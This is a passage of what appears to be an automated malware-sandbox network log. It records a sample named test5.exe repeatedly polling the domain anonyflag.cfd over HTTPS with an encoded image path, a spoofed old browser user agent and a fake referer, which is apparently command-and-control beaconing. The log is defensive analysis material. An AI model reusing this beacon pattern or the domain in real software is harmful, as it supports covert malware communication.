                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e93b4b47420a-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1621&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1801357&cwnd=251&unsent_bytes=0&cid=5c5f11aa1b9c1f55&ts=498&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.449761104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:46 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:46 UTC876INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:46 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:46 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZPos4l%2FqAb%2BkM3gYXbQ0dFJZZi6Ob7YwScVt4EJI0vRrxCo0t5KK17n4icdTw1xz3bid2iTtNSBiGphvXyGwYfsACBOtr9g8IC%2FBUKQLXPFHS0yMdYfkcI0ZJsFFK30r"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9474dfe7cb2-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1779&rtt_var=679&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1596500&cwnd=216&unsent_bytes=0&cid=567ca7236d1bb7a8&ts=513&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.449762104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:48 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:48 UTC876INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:48 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:48 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TQ3hLqX0W0NvJePJrfwp5%2F5%2BgEokGjnExTKLRdOzW88cNduwmSWnHs02KWNTLetM9H5J3AlZJFLLsOCMwaCewDJeDQE70zE9YrprosPGO19dKFpOuhVV%2FhyijEuNFaKb"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9530fe04339-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1690&rtt_var=649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1665715&cwnd=227&unsent_bytes=0&cid=71850ecf5ffb7a90&ts=504&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.449763104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:50 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:50 UTC876INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:50 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:50 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pHBul81guKHzzBE9LMtyKBr8dFAZIcaVnHo%2FPDJVI8JVInrh41bRDJleVZbrCMaxq8LGDqE6f85sNH%2FLjhrtCKE4p2yYQUg9jCt3RbkfL0AnRDkBEH6B1O6r2%2FWao1Rx"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e95f185443be-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2136&min_rtt=2126&rtt_var=818&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1320669&cwnd=226&unsent_bytes=0&cid=bc4371fca6dbd18f&ts=513&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.449764104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:52 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:52 UTC877INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:52 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:52 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ob1aifWjkiZrnQvPLMdQH9O14d3j1A68yW%2BHF5Rlg2d6%2FBfd67xggVB0baV%2Bv4jln0DhZYukD7HvPH2ubZDWx6PRS5HAy1dm1wFh8GVhieuCLMpYXkSqhUxKUW%2BNeIZl"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e96addfb4273-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1564&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1800246&cwnd=32&unsent_bytes=0&cid=423b3b9eb0e96fb3&ts=502&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.449765104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:53 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:54 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:54 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:54 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bCdZkrJAInJ%2FUyRNqa5p8K%2FKP2KOhfm0j3FkOWKmmyu5pRh6b9rLr4rBYrHyMw9yTwc7jaB%2FIn8HNMZQbSpsewHrcGWWAjZNXWDPXr%2Bt44GgNLSmdPWcgTHYrZHT7QT5"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9764f658ce8-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2005&rtt_var=767&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1412675&cwnd=239&unsent_bytes=0&cid=8c08d9ff814b248e&ts=496&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.449766104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:55 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:56 UTC880INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:55 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: HIT
                    Age: 1
                    Last-Modified: Sat, 28 Dec 2024 10:36:54 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F5t6CTyPZybcT%2Fha4B5TtKvoIhZ7RabqTTtDO4DsgLjfZv524dbk%2BZxBtunluYe7Gcmj267xBmzH%2B03N69qWXpsFZ6nBF8AzmXBMiEJQEYWdTss4bw09vgoUtYauWndb"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e981b82143b5-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1651&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1683967&cwnd=228&unsent_bytes=0&cid=436698efa5558aa5&ts=457&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.449768104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:57 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:57 UTC880INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:57 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:57 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F2l6bO8KMsYI7t7mkQ%2BMKkBYkYu0GdWKDrzjwfG7XlFhGkuk8jj0X1vRmh%2FcOAVxuKxf1X%2B6cx1k0kYU0DOAgIooSnOT5QmG%2Fr3krpxkR0NpbkgyBMsjnBforxqL%2FIVp"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e98cf91743b6-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2091&min_rtt=2085&rtt_var=794&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1367041&cwnd=224&unsent_bytes=0&cid=4ec937a7b87c4655&ts=494&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.449770104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:59 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:59 UTC872INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:59 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:59 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jqyk%2B5QENgRvulp0D0yOamTd3pZvhoxTXUtDrbGZ6VQo365GnKzuzvvKOlAyx9ON89xw5YZKAc3cWw51Q8BEU76GHakgFHODqMFMr2BygZrhT2H5LaXqZE0YhEvY6m0Z"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e998a9498c2d-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1767&rtt_var=677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1600877&cwnd=247&unsent_bytes=0&cid=69f276104ef5c139&ts=506&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.449776104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:01 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:01 UTC874INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:01 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:01 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TFqxXR4hyvcQopaXS0DJ39Ypv0Q0fATIY5vv3mXl1yR76Sx1pwoeX8ET%2F1eetK3OM6nu5Ho29w8pgC4pMgzzf2POzV0cFaOxf4LDo2GzwSJ7Mjt%2BFFXGE3SnnXRr9YGW"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9a4b93a42ce-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1639&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1749550&cwnd=233&unsent_bytes=0&cid=8e9444b826ed4a10&ts=517&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.449782104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:03 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:03 UTC890INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:03 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:03 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=khN%2BAUx28vEzu%2BKLF1z1tvg%2BQWMj4NbEfo5yzPkDDTiUg%2Fddh5fb0gJaxg2d83odLi289%2BW7gYoGqm3oX%2B3nJlmd3o%2BT%2BteW4JuvTBngeQ%2BH2T%2BuiBVkxezSwjtqnWOE"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9b08b9d43ab-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1739&rtt_var=695&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1679125&cwnd=221&unsent_bytes=0&cid=34d6b1838fade828&ts=513&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.449785104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:05 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:05 UTC876INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:05 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:05 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMInd6OW1mpX4FhM8qDE77QzV2qHnukuNfXZsa%2FfkuE7n%2FJPJXOIbF2IjlguDt0cNvF6nadzulI4satzSpYKtihdBKy1A760u3RhdeA7wNPuFqYZc%2BQRj2BdcgcN4x0p"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9bcbb73429e-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2002&min_rtt=1953&rtt_var=767&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1495135&cwnd=208&unsent_bytes=0&cid=eb2e91d225eae11f&ts=512&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.449789104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:06 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:07 UTC880INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:07 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:07 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kcUt0ruJYWjnngNEqlYCb%2B8lv2KTkfqvFAsfST%2B3GxMtq%2FyL0Px%2Be6HKWWJbT1bwSWNPP186Lp3R4hQnfrIgyxb8557gruF9wwbepaV%2FUC7u4CsEZDcP68qb8FkQ09Mp"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9c81a090f7b-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1446&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1605277&cwnd=205&unsent_bytes=0&cid=0277bb370649f89e&ts=494&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.449795104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:08 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:09 UTC886INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:09 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:09 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjAbnvmz0v%2Fjlr3Txt7tpcowIUnpa%2Bjgu%2B%2FCtVkjnBTrqHAgvci2%2BU04xcHyIxF2WaX%2FPL94zjz32zyeQPEgAdiYVO%2BpeaI6RC3lzjSx09L6eNFm7vdq6%2Fmdw4ljZaSB"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9d3688f424f-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2046&min_rtt=2040&rtt_var=778&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1394460&cwnd=233&unsent_bytes=0&cid=900b3686d15e8218&ts=492&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.449801104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
